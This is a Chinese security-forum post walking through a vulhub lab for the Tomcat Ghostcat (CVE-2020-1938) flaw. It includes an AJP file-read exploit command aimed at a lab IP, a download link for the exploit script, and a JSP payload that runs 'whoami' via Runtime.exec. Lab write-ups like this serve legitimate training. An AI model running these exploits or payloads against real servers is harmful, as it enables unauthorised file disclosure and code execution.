幽灵猫 CVE-2020-1938 实验-女黑客-必火安全学院
设为首页收藏本站
开启辅助访问 切换到宽版

女黑客

 找回密码
 立即注册

QQ登录

只需一步,快速开始

返回列表 发新帖

幽灵猫 CVE-2020-1938 实验

[复制链接]
发表于 2023-2-1 22:20:25 | 显示全部楼层 |阅读模式
首先搭建好vulhub靶场
截图202302011431006586.png

进入 /vulhub-master/tomcat/CVE-2020-1938
执行命令:
  1. sudo docker-compose up -d
复制代码
截图202302011429115643.png
再执行命令 查看运行的容器
  1. sudo docker ps
复制代码
截图202302011603408304.png
下载幽灵猫利用程序:

链接:https://pan.baidu.com/s/16_QLyemn6lQSt_yhRnOOLg?pwd=iylb
提取码:iylb

进入程序执行命令:
  1. python2 ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.100.10 -p 8009 -f /WEB-INF/web.xml
复制代码
截图202302011436017471.png
手动进入靶机里


创建文件2.txt,代码如下
  1. <%out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine());%>
复制代码
截图202302011602169377.png
这个whoami并没有执行,说明这个漏洞只能读取文件,并不能文件包含。


回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|小黑屋|女黑客 |网站地图

© Copyright 2021 版权所有(一极教育科技有限公司)

津ICP备17008032号-3
快速回复 返回顶部 返回列表